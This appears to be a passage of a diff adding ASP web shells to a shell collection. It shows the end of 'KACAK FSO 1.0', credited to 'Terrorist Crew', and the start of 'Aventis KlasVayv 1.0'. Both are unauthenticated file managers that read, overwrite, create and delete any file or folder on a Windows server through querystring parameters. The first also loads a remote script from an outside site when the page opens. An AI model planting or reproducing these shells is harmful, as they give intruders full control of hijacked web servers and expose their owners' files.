|
||||
set dossisx=server.createobject("scripting.filesystemobject")
|
||||
set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
|
||||
dosx.write request("duzenx")
|
||||
dosx.close
|
||||
set dosyax=nothing
|
||||
set dossisx=nothing
|
||||
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("duzenle") <> "" then
|
||||
set dossis=server.createobject("scripting.filesystemobject")
|
||||
set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
|
||||
sedx = dos.readall
|
||||
dos.close
|
||||
set dosya=nothing
|
||||
set dossis=nothing
|
||||
|
||||
set aktifklas=request.querystring("klas")
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
Kacak©<br>
|
||||
</span>Terrorist Crew<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="www.kacaq.blogspot.com" style="text-decoration: none">
|
||||
<font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Dosya</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(request.querystring("duzenle"))%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000">
|
||||
<form method="POST" action="?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
|
||||
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
</font></b></p>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
|
||||
<tr>
|
||||
<td width="100%" align="right">
|
||||
<p align="center">
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Kaydet"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span><a href=""><input type="reset" size="16"
|
||||
name="x" value="Vazgeç"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></a></td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#EAEAEA">
|
||||
<p align="right">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
|
||||
if request.querystring("klas") <> "" then
|
||||
aktifklas=Request.querystring("klas")
|
||||
if request.querystring("usak") = "1" then
|
||||
aktifklas=aktifklas & "\"
|
||||
end if
|
||||
|
||||
else
|
||||
aktifklas=server.mappath("/")
|
||||
aktifklas=aktifklas & "\"
|
||||
end if
|
||||
|
||||
if request.querystring("silklas") <> "" then
|
||||
set sis=createobject("scripting.filesystemobject")
|
||||
silincekklas=request.querystring("silklas")
|
||||
sis.deletefolder(silincekklas)
|
||||
set sis=nothing
|
||||
'response.write(sil & " Silindi")
|
||||
end if
|
||||
|
||||
if request.querystring("sildos") <> "" then
|
||||
silincekdos=request.querystring("sildos")
|
||||
set dosx=createobject("scripting.filesystemobject")
|
||||
set dos=dosx.getfile(silincekdos)
|
||||
dos.delete
|
||||
set dos=nothing
|
||||
set dosyasis=nothing
|
||||
end if
|
||||
|
||||
|
||||
|
||||
|
||||
select case aktifklas
|
||||
case "C:" aktifklas="C:\"
|
||||
case "D:" aktifklas="D:\"
|
||||
case "E:" aktifklas="E:\"
|
||||
case "F:" aktifklas="F:\"
|
||||
case "G:" aktifklas="G:\"
|
||||
case "H:" aktifklas="H:\"
|
||||
case "I:" aktifklas="I:\"
|
||||
case "J:" aktifklas="J:\"
|
||||
case "K:" aktifklas="K:\"
|
||||
end select
|
||||
|
||||
|
||||
|
||||
if aktifklas=("C:") then aktifklas=("C:\")
|
||||
|
||||
Set FS = CreateObject("Scripting.FileSystemObject")
|
||||
Set klasor = FS.GetFolder(aktifklas)
|
||||
Set altklasorler = klasor.SubFolders
|
||||
Set dosyalar = klasor.files
|
||||
%>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://img509.imageshack.us/img509/2842/spartaqt5.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
Kacak ©<br><br>
|
||||
</span>Terrorist Crew<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="www.kacaq.blogspot.com" style="text-decoration: none">
|
||||
<font color="#858585">www.kacaq.blogspot.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Klasör</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(aktifklas)%></font></td>
|
||||
<td width="65">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
|
||||
<a href="?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
|
||||
<font color="#000000">Üst Klasör</font></a></font></td>
|
||||
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
|
||||
<tr>
|
||||
<td width="625" bgcolor="#000000"><span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td bgcolor="#000000" height="20">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
|
||||
height="19" bordercolor="#000000">
|
||||
<span style="font-weight: 700">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="?suruculer=1" style="text-decoration: none">
|
||||
<font color="#9F9F9F">Sürücüler</font></a></font></span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
|
||||
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
|
||||
<tr>
|
||||
<td width="30" height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Tür</font></td>
|
||||
<td height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Dosya
|
||||
Adý</font></td>
|
||||
<td width="122" height="17" bgcolor="#9F9F9F">
|
||||
<p align="center">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Ýþlem</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<% For each oge in altklasorler %>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
|
||||
<tr>
|
||||
<td width="30" height="17" bgcolor="#808080">
|
||||
<p align="center">
|
||||
<img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
|
||||
<td height="17" bgcolor="#C4C4C4">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=oge.name%> </font></td>
|
||||
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
|
||||
<font color="#000000">Aç</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
|
||||
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a>
|
||||
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<% Next %>
|
||||
|
||||
|
||||
<% For each oge in dosyalar %>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
|
||||
<tr>
|
||||
<td width="30" height="1" bgcolor="#B0B0B0">
|
||||
<p align="center">
|
||||
<img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
|
||||
<td height="1" bgcolor="#EAEAEA">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=oge.name%> </font>
|
||||
<font face="Arial Narrow" style="font-size: 8pt"> ( <%=Round(oge.size/1024,1)%> KB ) </font></td>
|
||||
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a style="text-decoration: none" target="_self" href="?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
|
||||
<font color="#000000">Düzenle</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<% Next %>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if aktifklas=("C:\") then aktifklas=("C:")
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
<SCRIPT SRC=http://www.saldiri.org/summer/ciz.js></SCRIPT>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
901
xakep-shells/ASP/klasvayv.asp.txt
Normal file
901
xakep-shells/ASP/klasvayv.asp.txt
Normal file
|
@ -0,0 +1,901 @@
|
|||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv="Content-Language" content="tr">
|
||||
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||
<meta name="ProgId" content="FrontPage.Editor.Document">
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<title>Aventis KlasVayv 1.0</title>
|
||||
</head>
|
||||
|
||||
<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
|
||||
|
||||
<script language="JavaScript">
|
||||
<!--
|
||||
function MM_openBrWindow(theURL,winName,features) { //v2.0
|
||||
window.open(theURL,winName,features);
|
||||
}
|
||||
//-->
|
||||
</script>
|
||||
|
||||
<%
|
||||
if request.querystring("usklas") = "1" then
|
||||
on error resume next
|
||||
es=request.querystring("klas")
|
||||
diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
|
||||
|
||||
Select case es
|
||||
case "C:" diez="C:"
|
||||
case "D:" diez="D:"
|
||||
end select
|
||||
|
||||
|
||||
|
||||
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<body topmargin="0" leftmargin="0"
|
||||
onLoad="location.href='klasvayv.asp?klas=<%=diez%>&usak=1'">
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("dosyakaydet") <> "" then
|
||||
set kaydospos=createobject("scripting.filesystemobject")
|
||||
set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
|
||||
set kaydoses=nothing
|
||||
set kaydospos=nothing
|
||||
set kaydospos=createobject("scripting.filesystemobject")
|
||||
set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
|
||||
kaydoses.write request("duzenx")
|
||||
set kaydoses=nothing
|
||||
set kaydospos=nothing
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("yenidosya") <> "" then
|
||||
%>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KlasVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Klasör</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(request.querystring("yenidosya"))%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#B7B7B7">
|
||||
<form method="POST" action="klasvayv.asp?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
|
||||
<p align="center"><b><font size="1" face="Verdana">
|
||||
<br>
|
||||
Dosya Adý : <br>
|
||||
</font>
|
||||
</b><font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="97" maxlength="32"
|
||||
name="dosadi" value="Dosya Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
|
||||
<br>
|
||||
</font>
|
||||
<b><font size="1" face="Verdana">
|
||||
Ýçerik : <br>
|
||||
</font>
|
||||
<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
<br>
|
||||
</font></b>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Oluþtur"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></p>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
|
||||
<tr>
|
||||
<td width="100%" align="right" bgcolor="#000000">
|
||||
<p align="center">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#EAEAEA">
|
||||
<p align="right">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("klasorac") <> "" then
|
||||
|
||||
set doses=createobject("scripting.filesystemobject")
|
||||
set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
|
||||
set es=nothing
|
||||
set doses=nothing
|
||||
|
||||
|
||||
end if
|
||||
%>
|
||||
|
||||
<%
|
||||
if request.querystring("klasac") <> "" then
|
||||
|
||||
set aktifklas=request.querystring("aktifklas")
|
||||
|
||||
|
||||
%>
|
||||
<td width="65" bgcolor="#000000" height="76">
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KlasVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Alan</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=aktifklas%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
